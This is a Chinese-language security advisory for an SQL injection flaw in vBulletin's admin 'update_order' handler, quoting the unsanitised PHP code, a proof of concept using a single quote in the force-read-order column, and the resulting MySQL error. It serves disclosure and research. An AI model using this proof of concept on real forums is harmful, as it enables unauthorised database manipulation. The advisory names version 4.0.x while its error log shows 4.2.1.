order'参数SQL注入漏洞

发布日期:2013-07-24
更新日期:2013-07-27

受影响系统:
VBulletin VBulletin 4.0.x
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 61449

VBulletin是一个强大灵活并可完全根据自己的需要定制的论坛程序套件。

VBulletin 4.0.x没有有效过滤'update_order'变量,即将其用在语句中,在实现上存在SQL注入漏洞,成功利用后允许攻击者执行未授权数据库操作。

<*来源:n3tw0rk
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

The exploit is caused due to a variable named 'update_order' not being
sanitized before being used within an insert into statement.

if ($_REQUEST['do'] == 'update_order')
{
$vbulletin->input->clean_array_gpc('r', array(
'force_read_order'  => TYPE_ARRAY
));

if ($vbulletin->GPC['force_read_order'])
{
foreach ($vbulletin->GPC['force_read_order'] AS $threadid => $order)
{
$db->query_write("
UPDATE " . TABLE_PREFIX . "thread AS thread
SET force_read_order = '$order'
WHERE threadid = '$threadid'
");
}
}
  POC
You will need Admincp Access then go to
site.com/admincp/force_read_thread.php then in the force read order colum
put a ' into one of them to show this
Database error in vBulletin 4.2.1:

Invalid SQL:

UPDATE thread AS thread
SET force_read_order = '1''
WHERE threadid = '5161';

MySQL Error  : You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use near
'5161'' at line 2
Error Number  : 1064
Request Date  : Thursday, July 25th 2013 @ 01:20:52 AM
Error Date    : Thursday, July 25th 2013 @ 01:20:52 AM
Script        :
?do=update_order
Referrer      :
IP Address    :
Username      : n3tw0rk
Classname    :
MySQL Version :

建议:
--------------------------------------------------------------------------------
厂商补丁:

VBulletin
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

linux

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/2e83774ef0beed1128cb2574589e32f1.html